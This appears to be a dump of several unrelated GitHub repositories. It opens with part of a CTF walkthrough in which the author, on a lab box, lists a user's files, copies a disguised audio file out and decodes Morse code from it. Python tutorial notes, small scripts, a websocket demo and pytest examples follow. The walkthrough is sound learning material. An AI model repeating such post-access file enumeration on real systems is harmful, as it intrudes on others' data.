directory`. But, hey we've something that takes input. Maybe its the injection point? Also, with quick playing, I figured out it would not take no more than 1024 characters as the input.\n\n```shell\n$ whoami\nNickMason\n$ groups NickMason\nNickMason\n$ cd /home/NickMason/\n$ ls -liah\ntotal 1576\n24576 drwx------ 3 NickMason NickMason 512B Aug 8 2015 .\n 2 drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..\n24579 -rw-r--r-- 1 NickMason NickMason 87B Oct 24 17:34 .Xdefaults\n24580 -rw-r--r-- 1 NickMason NickMason 773B Oct 24 17:34 .cshrc\n24581 -rw-r--r-- 1 NickMason NickMason 103B Oct 24 17:34 .cvsrc\n24582 -rw-r--r-- 1 NickMason NickMason 398B Oct 24 17:34 .login\n24583 -rw-r--r-- 1 NickMason NickMason 175B Oct 24 17:34 .mailrc\n24584 -rw-r--r-- 1 NickMason NickMason 218B Oct 24 17:34 .profile\n24577 drwx------ 2 NickMason NickMason 512B Oct 28 04:48 .ssh\n24595 -rw-r--r-- 1 NickMason NickMason 1.3K Oct 26 08:58 bio.txt\n24602 -rw-r--r-- 1 NickMason NickMason 0B Oct 28 05:02 mbox\n24594 -rw-r--r-- 1 NickMason NickMason 749K Aug 8 2015 nick_mason_profile_pic.jpg\n$ cp nick_mason_profile_pic.jpg /tmp/\n$ chmod a+rw /tmp/nick_mason_profile_pic.jpg\n```\n\nWell, I could have just scp'd from the box itself to my system but either way, I wanted to get the file to the local because of the size unless it was a bit higher quality image. Anyway, once I copied the file to my system, I could not open it with the image viewer.\n\n```shell\n$ file nick_mason_profile_pic.jpg\nnick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I\n```\n\nIt revealed that its an Ogg file.. Ahh, trying to deceive meh? :D I renamed and listened to the music. I also thought in the background that this could also be a steganography stuff again. I immediately remembered the `cat somefile.ogg sometext_to_hide.txt > my-awesome-music.ogg` trick and tried to unzip the file. Well, it didn't work. Honestly, this point was where I got stuck for really long time. I read a lot on how data could be encoded and saved on audio files and read various features of audios. This is where I had to take a hint but I was running out of ideas. I checked one of the walkthroughs quickly to see if my route is correct or not and I saw that I had to get Morse code from the audio.\n\nRather than following the usual route now, I thought of playing with `sox`. I did come across [experimental morse decoder](http://morsecode.scphillips.com/labs/decoder/) written purely in javascript but didn't work on it.\n\n```shell\n$ sudo apt-get install -y sox\n$ sox nick_mason_profile_pic.ogg output.dat\n$ head -n10 output.dat\n; Sample Rate 44100\n; Channels 2\n 0 0 0\n 2.2675737e-05 0 0\n 4.5351474e-05 0 0\n 6.8027211e-05 0 0\n 9.0702948e-05 0 0\n 0.00011337868 0 0\n 0.00013605442 0 0\n 0.00015873016 0 0\n```\n\nI found some online post which had some information and also had done the work of creating morse code. I used the same [python script](codes/morse-code.py).\n\n```shell\n$ python morse-code.py\n .....--...-............-..-..........-....-.--.......-........................-.................................................................................................................................................................--..-.--....-.-..-.....-.............-...---.-.--..--.----.........------....-.....---..........-........................................-..-....................................--.-...-......---.....-......---.-----.....-...-....-...-......---.---.-.-...---.........-..-.-............-...--.---.-.-.-.....-.....-.-......-.......--.---.-.-....-.-..-----.--.--..-----....-.--.-.-....-..----------.-...-.------.-.--.-------..-.----...-..---.-----.....-.--...........-........-.-..-....-.-...-..-.-.----............................-----.----.-.-..--..-..-....--..........-.....--..-.........-...------...--.-.-.....--.------..-------..-..--.-.....-.-...................-..-...---...-.-----.-.---.-.----..-..------.---.------------.---..-..--.-------....--.----------.--..----.--.-------.----.-.-..--.---.---...----.-..-...--.---.-..-.---.--.--.-----..---.-.--.-------......-.-..-..---.--......-..--.-..-.-....-------...-----....-...---...--..............-.......................................-.........-----.-.---.-.-....-.-.......---------...--.-.-....-..---.--...---.--......-.-...-.............-.-...-..--..-.----.................-.-............-...---.--..--....-..--.--.----.-.----..--.-.-....-----.-.--.--.------.------.----.-.-..---.-.--...--.......--.-..-.-.............-..-.-.-....--.-.---.....-...--.--...------.....---..---..........--..-.......-.....-.-.-.-.-.-.-.---.-.-.----................-............................................................................................................................................................................................................................................................................................................................................................................................................................................................-..................-..................-.....................................................................................................................................................................-........................................................................................ ..... ..... ..... . .\n```\n\nThis looked good but it seemed I had to extract noise separately and run the sox and script over it (or the other way around?). I still need to play with it.\n\n#WIP\n" }, { "alpha_fraction": 0.5434530973434448, "alphanum_fraction": 0.5828505158424377, "avg_line_length": 18.177778244018555, "blob_id": "769405f2b30368110932aa7203b647077241fa86", "content_id": "b11bcfeaa078937127707fabd32a3e9f45ef8d5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 863, "license_type": "no_license", "max_line_length": 73, "num_lines": 45, "path": "/codes/morse-code.py", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Parse and aggregate file created by sox via the command:\n# sox inputfile.ext output.dat\n\nfp = open(\"output.dat\")\ndata = [int(abs(float(x.split()[1])) > 0.01) for x in fp.readlines()[2:]]\nfp.close()\n\n# count all the runs\ncounts = []\ncurrent = -1\ncount = 0\nfor i in data:\n if i != current:\n counts.append((current,count))\n current = i\n count = 0\n count += 1\n\n# now remove all short runs, which also removes the -1 row!\ncounts = [x for x in counts if x[1] >= 15]\n\n# and reaggregate everything\ncounts2 = []\ncurrent = -1\ncount = 0\nfor i in counts:\n if i[0] != current:\n counts2.append((current,count))\n current = i[0]\n count = 0\n count += i[1]\n\nmystr = \"\"\nfor x in counts2:\n if x[0] == 0:\n if x[1] > 350:\n mystr += \" \"\n elif x[0] == 1:\n if x[1] > 500:\n mystr += \"-\"\n else:\n mystr += \".\"\nprint mystr\n" } ]
6
cammac60/Python-notes
https://github.com/cammac60/Python-notes
b8206b2c0ed667dee7c2f4ce40eee62018ddb794
7b28e9c6510e421979ad8144c6ff748dcdd37370
afa2b0e01ed0ecda41b3bcb55ec05252a99fbfe8
refs/heads/master
2022-11-18T06:08:51.836760
2020-07-14T17:02:57
2020-07-14T17:02:57
279,402,627
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5648545026779175, "alphanum_fraction": 0.5808707475662231, "avg_line_length": 18.190475463867188, "blob_id": "c2bbf561fc4f2b915e7e30da8ce569ae34fe4a69", "content_id": "b31a7cadbafec94a9af291a11c0c26d9170e0517", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8866, "license_type": "no_license", "max_line_length": 184, "num_lines": 462, "path": "/basics.py", "repo_name": "cammac60/Python-notes", "src_encoding": "UTF-8", "text": "# VARIABLES:\n# No declaration\n#ex:\n\nfirst_var = \"varibale\"\n\n# Multiple declarations on the same line:\n\nsecond_var, third_var = 3, 4\n\n\n#-------------------------------------------------------------------------------\n\n\n# CONSOLE LOG/PRINT\n# Print to the console using:\n\nprint(\"Insert a string or a var\")\n# Output: \"Insert a string or a var\"\n\nprint(\"multiple things seperated by commas\", first_var)\n# Output: \"multiple things seperated by commas\" \"variable\"\n\n\n#-------------------------------------------------------------------------------\n\n\n# CONCATINATION/PLACEHOLDERS\n# A placeholder can be set using the % symbol followed by a letter in a string (%s for string, %d for num)\n# Ex:\n\nfirst_string = \"%s is learning python\"\n\n# Print the string above and add in a word like so:\n\nprint(first_string%(\"Cameron\"))\n\n# Output: \"Cameron is learning python\"\n\n# if a variable is being used the above example would change to:\n\nname = \"Cameron\"\nprint(first_string%name)\n\n# this can be done multiple times to the same string\n# ex:\n\nsecond_string = \"%s is learning python version %d\"\n\nprint(second_string%(\"Cameron\", 3))\n\n\n#-------------------------------------------------------------------------------\n\n\n# LISTS/ARRAYS\n\n# declare like so:\n\nfirst_list = [\"eggs\", \"milk\", \"coffee\", \"flour\"]\n\n# Accessed using bracket notation\n\nprint(first_list[0])\n\n# Output: \"eggs\"\n\n# Grab a portion of the array like so:\n\nprint(first_list[0:3])\n\n# Output: [\"eggs\", \"milk\", \"coffee\"]\n\n# First number represents starting point, second represents ending point. The end point will not be included in the return value so the example above grabs the items from index 0 to 2.\n\n# Use the append method to add an item to the end of the array\n# Ex:\n\nfirst_list.append(\"grapes\")\n\nprint(first_list)\n\n# Output: [\"eggs\", \"milk\", \"coffee\", \"flour\", \"grapes\"]\n\n# Use bracket notation to re-assign an index\n\n# Ex:\n\nfirst_list[0] = \"kiwis\"\n\nprint(first_list)\n\n# Output: [\"kiwis\", \"milk\", \"coffee\", \"flour\", \"grapes\"]\n\n# To remove an item from the array, use the del method\n\n# Ex:\n\ndel first_list[0]\n\nprint(first_list)\n\n# Output: [\"milk\", \"coffee\", \"flour\", \"grapes\"]\n\n# To see the amount of items in an array, use the len function\n\n# Ex:\n\nprint(len(first_list))\n\n# Output: 4\n\n# To add two arrays together, simply use the + operator\n\n# Ex:\n\nsecond_list = [\"bread\", \"cheese\"]\n\nprint(first_list + second_list)\n\n# Output: [\"milk\", \"coffee\", \"flour\", \"grapes\", \"bread\", \"cheese\"]\n\n# Use the max and min fn to find the max and min of a list\n\n# Ex:\n\nnumber_list = [1, 44, 5, 87, 3]\n\nprint(max(number_list), min(number_list))\n\n# Output: 87, 1\n\n\n#-------------------------------------------------------------------------------\n\n\n# OBJECTS/DICTIONARIES\n\n# Var Ex:\n\nstudents = {\"Bob\":34, \"Tim\":26, \"Sarah\":41}\n\n# Access using bracket notation\n# *If multiple keys have the same name, python will return the last one in the object when accessing\n\n# Ex:\n\nprint(students[\"Bob\"])\n\n# Output: 34\n\n# Re-assign:\n\nstudents[\"Tim\"] = 27\n\nprint(students[\"Tim\"])\n\n# Output: 27\n\n# Removing Elements:\n\ndel students[\"Bob\"]\n\nprint(students)\n\n# Output: {\"Tim\":27, \"Sarah\":41}\n\n# Find length:\n\nprint(len(students))\n\n# Output: 2\n\n\n#-------------------------------------------------------------------------------\n\n\n# TUPLES\n\n# The same as lists/arrays but immutable.\n\n# Declaration:\n\nfirst_tup = (1, 2, 3, 4, 5)\n\n# Tuples can still be added together or spliced\n# Tuples can still be deleted using the del method\n\n\n#-------------------------------------------------------------------------------\n\n\n# CONDITIONALS\n\n# Ex:\n\nif (5 > 3):\n print(\"true\")\n\nif (3 < 1):\n print(\"true\")\nelse:\n print(\"false\")\n\nif (3 == 3):\n print(\"true\")\n\n# Output: true, false, true\n# Use elif to add additional if statments\n# and replaces &&\n# or replaces ||\n\nage = 25\n\nif (age < 13):\n print(\"You can't see this PG-13 movie\")\nelif (age >= 13 and age < 18):\n print(\"You can see PG-13 but nor R\")\nelse:\n print(\"You can see whatever you want\")\n\n# Output: \"You can see whatever you want\"\n\n\n#-------------------------------------------------------------------------------\n\n\n# FOR LOOPS:\n\nlist1 = [\"apple\", \"orange\", \"cherry\"]\n\nfor item in list1:\n print(item)\n\n# Output: \"apple\", \"orange\", \"cherry\"\n\nfor i in range(0, 3):\n print(i)\n\n# Output 0, 1, 2\n\n# To increment by a certain amount, add an incementor as the third arg of orange\n\n# Ex:\n\nfor i in range(0, 10, 2):\n print(i)\n\n# Output: 0, 2, 4, 6, 8\n\n# Can be nested:\n\nfor i in range(0, 10, 2):\n for j in range(0, 6):\n print(i -j)\n\n\n#-------------------------------------------------------------------------------\n\n\n# WHILE LOOPS\n\nnum = 3\n\nwhile num <= 5:\n print(num)\n num = num + 1\n\n# Output: 3, 4, 5\n\n# Use break to end loop\n\nnum = 3\n\nwhile num < 6:\n print(num)\n if (num == 4):\n break\n num = num + 1\n\n# Use continue to stay in loop (In the example below, continue will skip on 3 and go back into the loop without running the print statement on the line below)\n\nnum = 0\n\nwhile num < 6:\n num = num + 1\n if (num == 3):\n continue\n print(num)\n\n# Output: 1, 2, 4, 5, 6\n# Use pass as a filler statement. For example, if you know you need an if statement but aren't sure what needs to go inside of it yet.\n\n\n#-------------------------------------------------------------------------------\n\n\n# TRY/EXCEPT\n\n# Operates the same as try and catch in JS\n\ntry:\n if undefined_var == 3:\n print(\"Hello\")\nexcept:\n print(\"The variable is undefined so we went into this block\")\n\n\n#-------------------------------------------------------------------------------\n\n\n# FUNCTIONS\n\n# Use def keyword to define methods followed by method name and parens for args. (Empty parens for no args)\n\n# Ex:\n\ndef hello_world():\n print(\"Hello world!\")\n\n# Fns are called in the same way as JS:\n\nhello_world()\n\ndef greeting(name):\n print(\"Hi \" + name + \"!\")\n\ngreeting(\"Cameron\")\n\ndef add_nums(num1, num2):\n print(num1 + num2)\n\nadd_nums(2, 5)\n\ndef return_num_sum(num1, num2):\n return num1 + num2\n\nsum = return_num_sum(10, 50)\n\nprint(sum)\n\n\n#-------------------------------------------------------------------------------\n\n\n# IN-BUILT FUNCTIONS\n\n# abs returns absolute\n\n# both examples will return 34:\n\nabs(-34)\nabs(34)\n\n# bool returns false if 0 or true if anything else\n\nbool(0) #false\nbool(100) #true\n\n# dir returns all in build methods that can be used on the specific data\n\ndir(\"Hello\") # returns all methods that are usable on a string\n\n# help method gives you more info on what the method will do when called on a specific piece of data:\n\nrandom_var = \"hello\"\n\n# help(random_var.upper)\n\n# this will return some info on what the upper method will do when called on random_var\n\n# eval takes strings and runs them as if they were python code:\n\nprint_str = 'print(\"hi\")'\n\neval(print_str)\n\n# Prints hi\n\n# *Use single quotations if the string needs to contain double quotes\n\n# exec() works the same as eval but is used for more complex multi-line code\n\n# int(), float(), and str() are used for converting datatypes\n\nint(\"1\") # = 1\nstr(1) # = \"1\"\nfloat(1) # = 1.0\n\n\n#-------------------------------------------------------------------------------\n\n\n# OOP/CLASSES\n\n# Use the class keyword to define a class\n\nclass Person:\n pass\n\n# Methods defined within the class must have the self param passed:\n\nclass Car:\n def get_make(self):\n print(\"Honda\")\n def get_model(self):\n print(\"Accord\")\n\ncar1 = Car()\n\ncar1.get_make() # prints Honda\ncar1.get_model() # prints Accord\n\n# self essentially tells the interperator which object is performing the method\n\n# to create custom params for each instance use __init__ (two underscores on both sides)\n\nclass City:\n def __init__(self, name, country):\n self.name = name\n self.country = country\n def get_name(self):\n print(\"This city is called \" + self.name)\n def get_country(self):\n print(\"This city is in \" + self.country)\n\ncity1 = City(\"Denver\", \"USA\")\n\ncity1.get_name()\ncity1.get_country()\n\n\n#-------------------------------------------------------------------------------\n\n\n# INHERITANCE\n\n\nclass Parent:\n def __init__(self):\n print(\"This is the parent class\")\n def parent_fn(self):\n print(\"This is the parent fn\")\n def same_name(self):\n print(\"parent\")\n\n# To create a child class, simply pass the parent class as a param when you create the child class:\n\nclass Child(Parent):\n def __init__(self):\n print(\"This is the child class\")\n def child_fn(self):\n print(\"This this the child fn\")\n def same_name(self):\n print(\"child\")\n\nc = Child()\n\n# methods from both the parent and child class can be called on the var class c\n# If two methods in the parent and child classes share the same name (ex: same_name ^^^) the child's method will replace the parents when a child is instantiated.\n\nc.same_name() # returns child\n" } ]
1
Karina9510/test_Python
https://github.com/Karina9510/test_Python
22b81ff40ebda428cd4576968e38517f4b7274d8
a3572da6da31ee30129d0e7e3c8747fadee8c010
f8c11d16f65ea20f16b70cb71ad48a5e818df031
refs/heads/main
2023-02-11T23:50:21.858782
2021-01-04T13:02:00
2021-01-04T13:02:00
326,685,052
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.44287267327308655, "alphanum_fraction": 0.4820457100868225, "avg_line_length": 13.298245429992676, "blob_id": "5e333c49aec24b26a732158c9fcd1871fa4136d2", "content_id": "c1fd13bbb7e73b601f8a689a4ee6af211d7772fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 919, "license_type": "no_license", "max_line_length": 39, "num_lines": 57, "path": "/rocniCislo.py", "repo_name": "Karina9510/test_Python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 4 12:11:29 2021\r\n\r\n@author: karina999\r\n\"\"\"\r\n\r\nfrom textwrap import wrap\r\nimport numbers\r\n\r\ns = \"13.5.1967\"\r\n\r\nvalues = wrap(s, 1)\r\n\r\nfor _ in range(5):\r\n del values[-1]\r\n \r\nprint(values)\r\n\r\ncelek = 0\r\n\r\nfor i in values: \r\n print(i)\r\n if i != \".\":\r\n celek = celek + int(i)\r\n print(\"je to celek\")\r\n print(celek)\r\n \r\n\r\nyear = \"2004\"\r\nyears = wrap(year, 1)\r\nprint(years)\r\n\r\ncelekYear = 0;\r\nfor i in years: \r\n celekYear = celekYear + int(i)\r\n print(celekYear)\r\n \r\n \r\n \r\ncislo = celek + celekYear\r\nprint(cislo)\r\n\r\nif cislo <= 9:\r\n print(\"cislo je\")\r\n print(cislo)\r\nelif cislo == 11:\r\n print(\"cislo je\")\r\n print(cislo)\r\nelse:\r\n print(\"cislo je\")\r\n list = [int(x) for x in str(cislo)]\r\n a = 0\r\n for i in list: \r\n a = a + i\r\n \r\n print(a) \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n " }, { "alpha_fraction": 0.5234375, "alphanum_fraction": 0.59375, "avg_line_length": 13.176470756530762, "blob_id": "a48e747230c4bd4c9a094aeb81acf54d6e844aec", "content_id": "0798bb7e48d7fa1cef0f8c96dff3a1ac3df747e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 256, "license_type": "no_license", "max_line_length": 55, "num_lines": 17, "path": "/rozdilMatic.py", "repo_name": "Karina9510/test_Python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 4 13:59:30 2021\r\n\r\n@author: karina999\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\n\r\nN = 4\r\n\r\ngrid = np.zeros((N, N), int)\r\nchoices = np.random.choice(grid.size, 6, replace=False)\r\ngrid.ravel()[choices] = 1\r\n\r\nprint(grid)" } ]
2
filipaivars/js_python_bidirectional_com
https://github.com/filipaivars/js_python_bidirectional_com
3f50a19beec9791784f37ab1ad926d33ad082c69
61ad0427ed7bdca80443efb84e9f1a2244b2866a
92bfec7385d2ad42609ec0f92f719a09ba44cc16
refs/heads/master
2020-12-12T17:53:43.529436
2020-01-16T00:32:37
2020-01-16T00:32:37
234,189,971
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7335723042488098, "alphanum_fraction": 0.7514934539794922, "avg_line_length": 58.71428680419922, "blob_id": "48d1f71baa7f5ac43f640ae109c22c08c352938f", "content_id": "b2ac09ea0419640e7128342d0253aa92983ab2de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 837, "license_type": "no_license", "max_line_length": 137, "num_lines": 14, "path": "/README.md", "repo_name": "filipaivars/js_python_bidirectional_com", "src_encoding": "UTF-8", "text": "# js_python_bidirectional_com\nBidirectional Communication Between Javascript and Python\n\n1. Launch Python server - `server.py`\n 1. This will launch the python server\n 2. Waiting for a message from the JS script (in-browser)\n2. Launch `index.html`\n 1. This will launch a webapp in your localhost\n 2. `index.html` has `manager.js` script imported\n 3. The JS script will send a message to your python server through port `8770`\n 4. Once the message is sent, you'll be able to check you received the message in the terminal in which you launched the python server\n 5. The python server will send back the same message received\n 6. In your browser console you'll be able to see a log checking you received the return message from the python server\n 7. Once you receive the message, the socket connection is closed\n\n" }, { "alpha_fraction": 0.6227461695671082, "alphanum_fraction": 0.633841872215271, "avg_line_length": 27.8799991607666, "blob_id": "9dad4b27e4a53b5cee8cf8048f2b997b963f4913", "content_id": "d0bce853dec7dae4f3a72fe37054c34a04c44b84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 721, "license_type": "no_license", "max_line_length": 100, "num_lines": 25, "path": "/scripts/manager.js", "repo_name": "filipaivars/js_python_bidirectional_com", "src_encoding": "UTF-8", "text": "var socket = new WebSocket('ws://localhost:8770/');\n\nsocket.onopen = function(event){\n socket.send('Hi');\n};\n\nsocket.onmessage = function(event){\n console.log(\"Message Received!\");\n console.log(event.data);\n socket.close() // this can be placed wherever it fits in your logic\n};\n\nsocket.onclose = function(event) {\n if (event.wasClean) {\n console.log(`[close] Connection closed cleanly, code=${event.code} reason=${event.reason}`);\n } else {\n // e.g. server process killed or network down\n // event.code is usually 1006 in this case\n console.log('[close] Connection died');\n }\n};\n\nsocket.onerror = function(error) {\n console.log(`[error] ${error.message}`);\n};" }, { "alpha_fraction": 0.5872235894203186, "alphanum_fraction": 0.5902948379516602, "avg_line_length": 21.013513565063477, "blob_id": "9868721fdd39575c5ef09f85f372f5907c4cf2f9", "content_id": "2a3305be96f64581f132974a975cc6ad993aa7b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1628, "license_type": "no_license", "max_line_length": 60, "num_lines": 74, "path": "/server.py", "repo_name": "filipaivars/js_python_bidirectional_com", "src_encoding": "UTF-8", "text": "# Note this is targeted at python 3\nimport tornado.web\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.websocket\nimport tornado.options\n\nLISTEN_PORT = 8770\nLISTEN_ADDRESS = 'localhost'\n\n\nclass MainHandler(tornado.websocket.WebSocketHandler):\n \"\"\"\n Handler that handles a websocket channel\n \"\"\"\n\n @classmethod\n def urls(cls):\n return [\n (r'/', cls, {}), # Route/Handler/kwargs\n ]\n\n def initialize(self):\n #self.channel = None\n print(\"initializing\")\n\n #def open(self, channel):\n def open(self):\n \"\"\"\n Client opens a websocket\n \"\"\"\n #self.channel = channel\n print(\"websocket opened\")\n\n def on_message(self, message):\n \"\"\"\n Message received on channel\n \"\"\"\n print(\"message received: \" + message)\n self.write_message(u\"You said: \" + message)\n #engine_AI.sendamessage(self)\n print(\"message sent\")\n\n def on_close(self):\n \"\"\"\n Channel is closed\n \"\"\"\n print(\"closing\")\n\n def check_origin(self, origin):\n \"\"\"\n Override the origin check if needed\n \"\"\"\n #print(\"origin\")\n #print(origin)\n return True\n\n\ndef main():\n # Create tornado application and supply URL routes\n application = tornado.web.Application([\n (r\"/\", MainHandler),\n ])\n\n # Setup HTTP Server\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(LISTEN_PORT, LISTEN_ADDRESS)\n\n # Start IO/Event loop\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == '__main__':\n main()" } ]
3
vitsaidl/workshops
https://github.com/vitsaidl/workshops
2ab4ca0590ee7b69ae7ba72a3cd408544c324d51
09773e5d937bf01f72acb933bdb60ae6fbde7add
1c1c032f0f8a8f4de18089dab13b2cd76a31ddd4
refs/heads/master
2023-08-31T10:46:56.110882
2023-08-27T13:18:39
2023-08-27T13:18:39
242,579,894
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.6917229890823364, "alphanum_fraction": 0.7060810923576355, "avg_line_length": 31.452054977416992, "blob_id": "d1901801bfb6f2769918e36d748ac428811b655b", "content_id": "ee4db5aec242fac223205b9f5c760eb19840447e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2368, "license_type": "no_license", "max_line_length": 90, "num_lines": 73, "path": "/pytest/pytest_operative/tests/test_get_increment_by_five.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import some_tested_script\nimport pytest\n\ndef test_simple_example_1():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\ndef test_simple_example_2():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n \ndef test_simple_exercise():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\ndef test_trivial_exercise():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\[email protected]\ndef test_marked_as_computation():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n \[email protected]\ndef test_marked_as_something():\n orig_number = 1\n expected_result = 7\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n \[email protected]\ndef test_marked_as_computation_too():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\[email protected] \ndef test_to_skip():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\[email protected]\ndef test_to_maybe_fail():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result \n \[email protected]\ndef test_to_fail():\n orig_number = 1\n expected_result = 7\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\[email protected](\"some_input, expected_result\", [(11, 16), (20, 25), (20, 26)]) \ndef test_parametrized(some_input, expected_result):\n actual_result = some_tested_script.get_increment_by_five(some_input)\n assert expected_result == actual_result" }, { "alpha_fraction": 0.5740740895271301, "alphanum_fraction": 0.5802469253540039, "avg_line_length": 31.600000381469727, "blob_id": "9fa4e24333e649b7709d4b948750749ae54c2b04", "content_id": "2c654a26cf2277d50ebc4150c62e37d9f2f72305", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 162, "license_type": "no_license", "max_line_length": 60, "num_lines": 5, "path": "/pytest/contexts/script_for_context.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "def create_html_page()->None:\n page_text = \"<b>Hello world</b>\"\n \n with open(\"index.html\", \"w+\", encoding=\"utf-8\") as file:\n file.write(page_text)" }, { "alpha_fraction": 0.7248520851135254, "alphanum_fraction": 0.7248520851135254, "avg_line_length": 36.66666793823242, "blob_id": "cfd20efcd8a0380c8144e46f4e0e048e22bbd248", "content_id": "7fe1668e6e9346a672d159b3a71335af030e8b5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 338, "license_type": "no_license", "max_line_length": 86, "num_lines": 9, "path": "/pytest/mocks/tests/test_get_frame_without_col.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_mocks\nfrom unittest.mock import Mock\n\ndef test_insert_in_mock_returns_something():\n mocked_object = Mock()\n mocked_object.drop.return_value = \"there should be a frame\"\n returned_value = script_for_mocks.get_frame_without_col(mocked_object, \"some_col\")\n \n assert returned_value == \"there should be a frame\"" }, { "alpha_fraction": 0.6598150134086609, "alphanum_fraction": 0.6618704795837402, "avg_line_length": 27.647058486938477, "blob_id": "31de7e0b60f69d6ef378099d1c7891c24b2c5502", "content_id": "e465e56993ffc8689c6d24ae63a7707286611c5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 973, "license_type": "no_license", "max_line_length": 64, "num_lines": 34, "path": "/pytest/contexts/tests/test_create_html_page.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "from unittest.mock import Mock, MagicMock\nimport script_for_context\n\ndef test_open_called_once(monkeypatch):\n fake_file_object = Mock()\n \n def fake_open(*args, **kwargs):\n context_object = MagicMock()\n context_object.__enter__.return_value = fake_file_object\n return context_object\n \n monkeypatch.setattr(\"builtins.open\", fake_open)\n \n script_for_context.create_html_page()\n\n assert 1 == fake_file_object.write.call_count\n\n\ndef test_open_called_with_expected_argument(monkeypatch):\n fake_file_object = Mock()\n \n def fake_open(*args, **kwargs):\n context_object = MagicMock()\n context_object.__enter__.return_value = fake_file_object\n return context_object\n \n monkeypatch.setattr(\"builtins.open\", fake_open)\n\n script_for_context.create_html_page()\n \n expected_html_string = \"<b>Hello world</b>\"\n\n args, _ = fake_file_object.write.call_args\n assert expected_html_string == args[0]" }, { "alpha_fraction": 0.6932271122932434, "alphanum_fraction": 0.717131495475769, "avg_line_length": 30.5, "blob_id": "c3a57e1f9ba66fee0a561909a55da0826d823bce", "content_id": "f0e24460295347a01a9fc9a7c9df933e50a81bb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 251, "license_type": "no_license", "max_line_length": 83, "num_lines": 8, "path": "/pytest/first_tests/tests/test_get_sum_of_two_numbers.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import math_script\n\ndef test_expected_sum_returned():\n first_number = 10\n second_number = 32\n expected_result = 42\n actual_result = math_script.get_sum_of_two_numbers(first_number, second_number)\n assert expected_result == actual_result" }, { "alpha_fraction": 0.6858638525009155, "alphanum_fraction": 0.6858638525009155, "avg_line_length": 26.285715103149414, "blob_id": "e2c6a7a8fe84e9d91c802b81f1cd94132fa0f61d", "content_id": "1e8e6a16f26504ccc9f2b4921036c41b0bd04cd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 191, "license_type": "no_license", "max_line_length": 54, "num_lines": 7, "path": "/pytest/pytest_operative/tests/test_get_some_list.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import some_tested_script\n\ndef test_this_will_fail():\n expected_result = [\"three\"]\n actual_result = some_tested_script.get_some_list()\n \n assert expected_result == actual_result\n" }, { "alpha_fraction": 0.694730818271637, "alphanum_fraction": 0.7038946151733398, "avg_line_length": 34.408164978027344, "blob_id": "4381aaaa2fe6952b893c8475126d1794de63fc2c", "content_id": "e1478f57a4b13ca7f5b0781ceff257af20c678ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1746, "license_type": "no_license", "max_line_length": 79, "num_lines": 49, "path": "/pytest/mocks/tests/test_do_something_with_frame.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_mocks\nfrom unittest.mock import Mock\n\ndef test_insert_called_two_times():\n mocked_object = Mock()\n script_for_mocks.do_something_with_frame(mocked_object)\n expected_insert_calls = 2\n actual_insert_calls = mocked_object.insert.call_count\n \n assert expected_insert_calls == actual_insert_calls\n\ndef test_insert_called_once():\n mocked_object = Mock()\n 